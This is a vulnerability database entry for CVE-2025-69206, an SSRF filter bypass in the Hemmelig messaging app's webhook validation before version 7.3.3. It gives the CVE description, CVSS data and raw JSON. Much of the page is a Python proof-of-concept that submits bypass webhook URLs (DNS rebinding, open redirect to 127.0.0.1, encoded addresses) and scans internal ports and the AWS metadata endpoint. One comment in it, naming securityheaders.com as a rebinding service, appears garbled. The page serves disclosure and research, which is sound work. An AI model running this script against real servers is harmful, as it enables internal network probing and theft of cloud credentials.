Security Vulnerability Report
中文
CVE-2025-69206 CVSS 4.3 MEDIUM

CVE-2025-69206

Published: 2025-12-29 16:15:44
Last Modified: 2026-01-06 16:30:11
Source: [email protected]

Description

Hemmelig is a messing app with with client-side encryption and self-destructing messages. Prior to version 7.3.3, a Server-Side Request Forgery (SSRF) filter bypass vulnerability exists in the webhook URL validation of the Secret Requests feature. The application attempts to block internal/private IP addresses but can be bypassed using DNS rebinding or open redirect services. This allows an authenticated user to make the server initiate HTTP requests to internal network resources. Version 7.3.3 contains a patch for the issue.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hemmelig:hemmelig:*:*:*:*:*:*:*:* - VULNERABLE
Hemmelig.app < 7.3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # CVE-2025-69206 PoC - SSRF Filter Bypass in Hemmelig Secret Requests # Target: Hemmelig.app < 7.3.3 # Configuration TARGET_URL = "https://hemmelig.app" ATTACKER_TOKEN = "your_auth_token_here" # Method 1: DNS Rebinding Bypass # Setup a DNS rebinding service (e.g., https://securityheaders.com/?q=https://attacker-controlled-domain.com) # Point domain to external IP first, then internal IP def create_secret_request_with_ssrf(target_url): """ Create a Secret Request with webhook URL pointing to internal resource using DNS rebinding or open redirect bypass """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Bypass techniques: # 1. DNS Rebinding: Use controlled domain that switches IP webhook_url = "https://attacker-domain.com/rebind-target" # 2. Open Redirect: Use trusted service redirect # webhook_url = "https://google.com/url?url=http://127.0.0.1:8080/admin" # 3. URL encoding/obfuscation # webhook_url = "http://127.0.0.1%2f%2f127.0.0.1" payload = { "title": "Test Secret Request", "webhook_url": webhook_url, "secret_data": "test" } response = requests.post( f"{target_url}/api/v1/secret-request", json=payload, headers=headers ) return response.status_code, response.text # Method 2: Internal Network Scanning def scan_internal_ports(target_url, token): """ Use SSRF to scan internal ports of the server """ headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Common internal services to probe internal_targets = [ "http://127.0.0.1:22", "http://127.0.0.1:80", "http://127.0.0.1:443", "http://127.0.0.1:8080", "http://127.0.0.1:3306", "http://169.254.169.254/latest/meta-data/" # AWS metadata ] results = [] for target in internal_targets: payload = { "webhook_url": target, "title": "Port Scan" } try: resp = requests.post( f"{target_url}/api/v1/secret-request", json=payload, headers=headers, timeout=5 ) results.append({"target": target, "status": resp.status_code}) except Exception as e: results.append({"target": target, "error": str(e)}) return results if __name__ == "__main__": print("CVE-2025-69206 PoC - Hemmelig SSRF Bypass") print("=" * 50) # Test webhook creation with SSRF payload status, response = create_secret_request_with_ssrf(TARGET_URL) print(f"Webhook Creation Status: {status}") print(f"Response: {response}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69206", "sourceIdentifier": "[email protected]", "published": "2025-12-29T16:15:44.090", "lastModified": "2026-01-06T16:30:10.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hemmelig is a messing app with with client-side encryption and self-destructing messages. Prior to version 7.3.3, a Server-Side Request Forgery (SSRF) filter bypass vulnerability exists in the webhook URL validation of the Secret Requests feature. The application attempts to block internal/private IP addresses but can be bypassed using DNS rebinding or open redirect services. This allows an authenticated user to make the server initiate HTTP requests to internal network resources. Version 7.3.3 contains a patch for the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hemmelig:hemmelig:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.3.3", "matchCriteriaId": "C186A84F-C51F-476B-8C55-3AB20A7C8B79"}]}]}], "references": [{"url": "https://github.com/HemmeligOrg/Hemmelig.app/commit/6c909e571d0797ee3bbd2c72e4eb767b57378228", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/HemmeligOrg/Hemmelig.app/security/advisories/GHSA-vvxf-wj5w-6gj5", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/HemmeligOrg/Hemmelig.app/security/advisories/GHSA-vvxf-wj5w-6gj5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.